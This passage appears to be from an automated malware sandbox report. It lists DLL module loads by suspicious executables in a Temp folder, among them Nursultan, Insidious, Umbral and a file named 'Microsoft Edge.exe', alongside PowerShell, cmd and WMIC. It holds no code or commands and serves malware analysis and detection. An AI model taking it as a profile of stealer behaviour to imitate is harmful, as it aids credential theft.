                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: slc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: sppc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: sxs.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: mpr.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: scrrun.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: linkinfo.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: ntshrui.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: cscapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: avicap32.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: msvfw32.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: winmm.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: winmm.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: propsys.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: edputil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: netutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: slc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: sppc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
                            Source: C:\Windows\System32\cmd.exe  Section loaded: cmdext.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: propsys.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: edputil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: netutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: slc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: sppc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: ntmarta.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: rasman.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: secur32.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: schannel.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: windowscodecs.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: amsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: propsys.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: edputil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: netutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: slc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: sppc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exe  Section loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe  Section loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: rasman.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: secur32.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: schannel.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: ntmarta.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: dpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: sxs.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: devenum.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: winmm.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: devobj.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: msdmo.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exe  Section loaded: windowscodecs.dll
                            Source: C:\Windows\System32\cmd.exe  Section loaded: winbrand.dll
                            Source: C:\Windows\System32\cmd.exe  Section loaded: wldp.dll
                            Source: C:\Windows\System32\chcp.com  Section loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.com  Section loaded: fsutilext.dll
                            Source: C:\Windows\System32\timeout.exe  Section loaded: version.dll
                            Source: C:\Windows\System32\cmd.exe  Section loaded: cmdext.dll
                            Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: iphlpapi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: framedynos.dll
                            Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: sspicli.dll
                            Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: msxml6.dll
                            Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: urlmon.dll
                            Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: iertutil.dll
                            Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: srvcli.dll
                            Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: netutils.dll
                            Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: uxtheme.dll
                            Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: vcruntime140.dll
                            Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: vcruntime140_1.dll
                            Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: amsi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: profapi.dll
                            Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: vbscript.dll
                            Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: sxs.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exe  Section loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exe  Section loaded: uxtheme.dll
